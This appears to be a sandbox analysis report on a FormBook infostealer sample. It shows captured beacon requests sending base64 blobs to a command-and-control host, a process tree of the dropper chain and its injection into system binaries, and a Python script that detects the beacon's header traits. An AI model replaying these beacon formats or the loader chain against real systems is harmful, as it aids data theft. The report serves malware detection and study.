                                                                                             Timestamp: Nov 6, 2024 16:07:54.105756044 CET | Bytes transferred: 1812 | Direction: OUT
                                                                                             POST /f8et/ HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Cache-Control: no-cache
                                                                                            Connection: close
                                                                                            Content-Length: 1248
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: www.sadey.info
                                                                                            Origin: http://www.sadey.info
                                                                                            Referer: http://www.sadey.info/f8et/
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                            Data Raw: 38 52 4e 34 6f 52 71 3d 61 65 57 76 65 37 75 71 2f 49 48 74 42 76 71 69 35 74 49 52 31 4a 35 36 6f 4a 34 53 62 32 31 79 2b 2f 65 77 35 34 38 6c 45 56 71 65 59 63 69 4c 70 6c 54 36 73 6d 5a 72 68 70 75 49 68 47 34 57 71 70 4c 76 45 70 76 76 72 6d 47 2b 7a 68 56 46 75 46 54 4a 54 65 57 55 53 2f 4b 75 67 65 5a 51 58 6b 6c 6b 2b 2f 52 7a 48 63 71 41 57 42 36 34 4a 53 76 62 56 47 42 32 38 74 4d 49 39 74 59 6c 45 45 70 68 73 57 57 47 4a 34 52 56 74 70 51 6c 66 78 58 4f 4b 5a 72 62 4a 54 44 69 6a 55 79 4b 66 6d 46 59 2f 48 77 65 7a 71 71 59 49 31 2f 67 79 53 69 6e 62 6d 34 42 6c 6a 54 4a 76 66 62 7a 76 6c 58 66 41 53 50 55 39 6c 75 7a 71 72 79 4b 42 67 68 79 4e 44 44 7a 72 75 37 7a 73 42 62 61 57 30 48 48 4a 35 46 46 50 65 41 49 4a 74 45 35 47 31 6d 74 76 42 4d 4f 2b 78 54 55 30 5a 68 47 77 64 37 62 5a 4e 44 6d 41 49 4f 7a 46 71 6e 6a 76 75 69 47 4e 53 70 65 75 65 33 73 44 79 74 2f 4d 34 4e 58 72 56 58 71 48 63 6b 45 78 4c 6c 42 70 45 6c 71 74 58 34 52 64 6a 42 75 44 46 70 65 4d 41 53 70 38 62 33 65 44 56 [TRUNCATED]
                                                                                             Data Ascii: 8RN4oRq=aeWve7uq/IHtBvqi5tIR1J56oJ4Sb21y+/ew548lEVqeYciLplT6smZrhpuIhG4WqpLvEpvvrmG+zhVFuFTJTeWUS/KugeZQXklk+/RzHcqAWB64JSvbVGB28tMI9tYlEEphsWWGJ4RVtpQlfxXOKZrbJTDijUyKfmFY/HwezqqYI1/gySinbm4BljTJvfbzvlXfASPU9luzqryKBghyNDDzru7zsBbaW0HHJ5FFPeAIJtE5G1mtvBMO+xTU0ZhGwd7bZNDmAIOzFqnjvuiGNSpeue3sDyt/M4NXrVXqHckExLlBpElqtX4RdjBuDFpeMASp8b3eDV [TRUNCATED]
                                                                                             Timestamp: Nov 6, 2024 16:07:54.792356968 CET | Bytes transferred: 533 | Direction: IN
                                                                                             HTTP/1.1 404 Not Found
                                                                                            Date: Wed, 06 Nov 2024 15:07:54 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 389
                                                                                            Connection: close
                                                                                            Content-Type: text/html
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                             Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                             Session ID: 12 | Source IP: 192.168.2.6 | Source Port: 49997 | Destination IP: 162.0.225.218 | Destination Port: 80
                                                                                             Timestamp: Nov 6, 2024 16:07:57.210938931 CET | Bytes transferred: 525 | Direction: OUT
                                                                                             GET /f8et/?SBV8T=1lJpZfbXA4K&8RN4oRq=Xc+PdMClmL/WIO2isq0x5LlJuoJRDXdLpdKh2o4ZOQaHQca6wh6b+iZ++523jXtiu5eeO8fPpGm95hdP5yrPQZ/IU8CBx+hGfkwf4+1MD46FKwSALgSHTW1ViZ9EzcIAYloemhI= HTTP/1.1
                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                            Connection: close
                                                                                            Host: www.sadey.info
                                                                                            User-Agent: SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) Presto/2.12.423 Version/12.16
                                                                                             Timestamp: Nov 6, 2024 16:07:57.941618919 CET | Bytes transferred: 548 | Direction: IN
                                                                                             HTTP/1.1 404 Not Found
                                                                                            Date: Wed, 06 Nov 2024 15:07:57 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 389
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                             Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
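The requests in sessions 10 to 12 share one shape: a POST or GET to a short token path on www.sadey.info, a single form field or query value carrying an opaque base64 blob, Referer equal to Origin plus the path, Connection: close, and a feature-phone Opera Mini/J2ME User-Agent sent alongside an Accept header (image/avif, application/signed-exchange) that belongs to current desktop Chrome, not to any Opera Mini build. The Python below is an added example and not code from the Joe Sandbox report: it parses raw requests rebuilt from sessions 10 and 12 above and lists which of those traits each one exhibits. The indicator names, the 3-to-6-character path heuristic, the three-trait threshold and the benign control request are this example's own assumptions.

```python
"""Flag FormBook-style beacon traits in captured HTTP requests.

Added example, not code from the Joe Sandbox report. The sample requests are
rebuilt from sessions 10 and 12 above; indicator names, the short-path
heuristic and the benign control request are this example's own assumptions.
"""
import re
from urllib.parse import urlsplit

LEGACY_UA_MARKERS = ("J2ME", "MIDP", "Opera Mini", "Presto/")
CHROME_ACCEPT_TOKENS = ("image/avif", "application/signed-exchange")  # desktop-Chrome Accept
BEACON_PATH = re.compile(r"^/[a-z0-9]{3,6}/$")  # e.g. /f8et/ (assumed heuristic)
B64_VALUE = re.compile(r"[A-Za-z0-9+/]+=*")


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def split_form(data: str):
    """Split k=v&k=v pairs without decoding, so '+' and '/' inside base64 survive."""
    return [part.partition("=")[::2] for part in data.split("&") if part]


def formbook_indicators(raw: str):
    """Return the beacon traits a request exhibits, in a fixed order (empty = nothing odd)."""
    method, target, h, body = parse_request(raw)
    parts = urlsplit(target)
    hits = []

    if BEACON_PATH.match(parts.path):
        hits.append("short-token-path")

    ua, accept = h.get("user-agent", ""), h.get("accept", "")
    if any(m in ua for m in LEGACY_UA_MARKERS) and any(t in accept for t in CHROME_ACCEPT_TOKENS):
        hits.append("ua-accept-mismatch")  # feature-phone UA, modern-browser Accept

    origin, referer = h.get("origin"), h.get("referer")
    if origin and referer == origin + parts.path and h.get("connection", "").lower() == "close":
        hits.append("self-referer-close")

    if method == "POST" and h.get("content-type") == "application/x-www-form-urlencoded":
        fields = split_form(body)
        if len(fields) == 1 and B64_VALUE.fullmatch(fields[0][1]):
            hits.append("single-base64-form-field")
    elif method == "GET" and parts.query:
        if any(B64_VALUE.fullmatch(v) and len(v) >= 40 for _, v in split_form(parts.query)):
            hits.append("base64-blob-in-query")
    return hits


def is_beacon(raw: str, threshold: int = 3) -> bool:
    """Treat three or more traits on one request as a beacon (threshold is an assumption)."""
    return len(formbook_indicators(raw)) >= threshold


CRLF = "\r\n"
UA = ("SAMSUNG-GT-E2202 Opera/9.80 (J2ME/MIDP; Opera Mini/4.4.32208/37.6334; U; en) "
      "Presto/2.12.423 Version/12.16")
ACCEPT = ("text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,"
          "image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7")

# Session 10 above (POST), rebuilt from the captured headers and body.
POST_BEACON = CRLF.join([
    "POST /f8et/ HTTP/1.1", "Accept: " + ACCEPT, "Accept-Encoding: gzip, deflate, br",
    "Accept-Language: en-US,en;q=0.9", "Cache-Control: no-cache", "Connection: close",
    "Content-Length: 236", "Content-Type: application/x-www-form-urlencoded",
    "Host: www.sadey.info", "Origin: http://www.sadey.info",
    "Referer: http://www.sadey.info/f8et/", "User-Agent: " + UA, "",
    "8RN4oRq=aeWve7uq/IHtBvqi5tIR1J56oJ4Sb21y+/ew548lEVieYv6Lu0T6vmZr9ZuJhG5EqovjEpTVrk++yDtF"
    "/nrJYeWUdfKjkeZFXk0v+/BzHcqAWDy4ajvbF2B1sNM65tYdEEwUsWSwILpVqJAldDPOXprdMTD6jVOVfilq"
    "/HtWzqeYYCChpyqHPg0slBT+jYr4kkyvEjf8622h0MqCMW0IHhz/kYOFugjeCA==",
])

# Session 12 above (GET with the blob in the query string).
GET_BEACON = CRLF.join([
    "GET /f8et/?SBV8T=1lJpZfbXA4K&8RN4oRq=Xc+PdMClmL/WIO2isq0x5LlJuoJRDXdLpdKh2o4ZOQaHQca6wh6b"
    "+iZ++523jXtiu5eeO8fPpGm95hdP5yrPQZ/IU8CBx+hGfkwf4+1MD46FKwSALgSHTW1ViZ9EzcIAYloemhI= HTTP/1.1",
    "Accept: " + ACCEPT, "Accept-Language: en-US,en;q=0.9", "Connection: close",
    "Host: www.sadey.info", "User-Agent: " + UA, "", "",
])

# Constructed benign control: an ordinary browser page fetch (not from the report).
BENIGN = CRLF.join([
    "GET /index.html HTTP/1.1", "Accept: " + ACCEPT, "Accept-Language: en-US,en;q=0.9",
    "Connection: keep-alive", "Host: example.org",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) "
    "Chrome/118.0.0.0 Safari/537.36", "", "",
])

if __name__ == "__main__":
    for name, req in ("POST_BEACON", POST_BEACON), ("GET_BEACON", GET_BEACON), ("BENIGN", BENIGN):
        print(name, is_beacon(req), formbook_indicators(req))
```

The UA/Accept contradiction is the trait worth keying on in production: the path token, field name and blob change per campaign, but a client that claims to be Opera Mini on a J2ME handset while negotiating AVIF and signed exchanges is lying about what it is.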


                                                                                            Target ID:0
                                                                                            Start time:10:05:49
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\FS04dlvJrq.exe"
                                                                                            Imagebase:0xe60000
                                                                                            File size:1'336'477 bytes
                                                                                            MD5 hash:15227B37F486CB74C7676395A12C9296
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:10:05:54
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\tsmr.vbe"
                                                                                            Imagebase:0x810000
                                                                                            File size:147'456 bytes
                                                                                            MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:10:06:03
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:10:06:04
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:10:06:04
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c bpqdpksed.icm vbepwhj.mp3
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:10:06:04
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:10:06:04
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:ipconfig /release
                                                                                            Imagebase:0x6c0000
                                                                                            File size:29'184 bytes
                                                                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:10:06:04
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:bpqdpksed.icm vbepwhj.mp3
                                                                                            Imagebase:0xd60000
                                                                                            File size:947'288 bytes
                                                                                            MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 0%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:10:06:07
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                                                                            Imagebase:0x1c0000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:10:06:07
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff66e660000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:12
                                                                                            Start time:10:06:07
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:ipconfig /renew
                                                                                            Imagebase:0x6c0000
                                                                                            File size:29'184 bytes
                                                                                            MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:15
                                                                                            Start time:10:06:16
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                            Imagebase:0xa50000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2646366966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2647309588.0000000001800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2647394884.0000000001870000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            Has exited:true

                                                                                            Target ID:16
                                                                                            Start time:10:06:16
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                            Imagebase:0x350000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Target ID:19
                                                                                            Start time:10:06:16
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5932 -s 80
                                                                                            Imagebase:0x440000
                                                                                            File size:483'680 bytes
                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:21
                                                                                            Start time:10:06:34
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe"
                                                                                            Imagebase:0xbb0000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.3357716278.0000000002590000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                            Has exited:false

                                                                                            Target ID:22
                                                                                            Start time:10:06:37
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Windows\SysWOW64\EhStorAuthn.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\EhStorAuthn.exe"
                                                                                            Imagebase:0x2a0000
                                                                                            File size:119'808 bytes
                                                                                            MD5 hash:0C9245FDD67B14B9E7FBEBB88C3A5E7F
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3357840971.0000000004240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3355319843.00000000022E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.3355834381.00000000027E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            Has exited:false

                                                                                            Target ID:23
                                                                                            Start time:10:06:51
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\fBxVkpyWjFysZpnbTZCtrqnvektNgHYvVgVwuzNKiDCNLsmIagtlNwp\rmfPfCOHcNt.exe"
                                                                                            Imagebase:0xbb0000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.3359416956.0000000004D10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            Has exited:false

                                                                                            Target ID:24
                                                                                            Start time:10:07:07
                                                                                            Start date:06/11/2024
                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                            Imagebase:0x7ff728280000
                                                                                            File size:676'768 bytes
                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true


                                                                                              Execution Graph

                                                                                              Execution Coverage:9.7%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:10.7%
                                                                                              Total number of Nodes:1956
                                                                                              Total number of Limit Nodes:38
                                                                                              execution_graph: raw node/edge listing of the interactive execution-graph viewer (node IDs, code addresses and resolved API names such as LoadLibraryExA, GetProcAddress, VirtualProtect, CreateFileMappingW, MapViewOfFile and ShellExecuteExW); the listing is truncated in this capture.
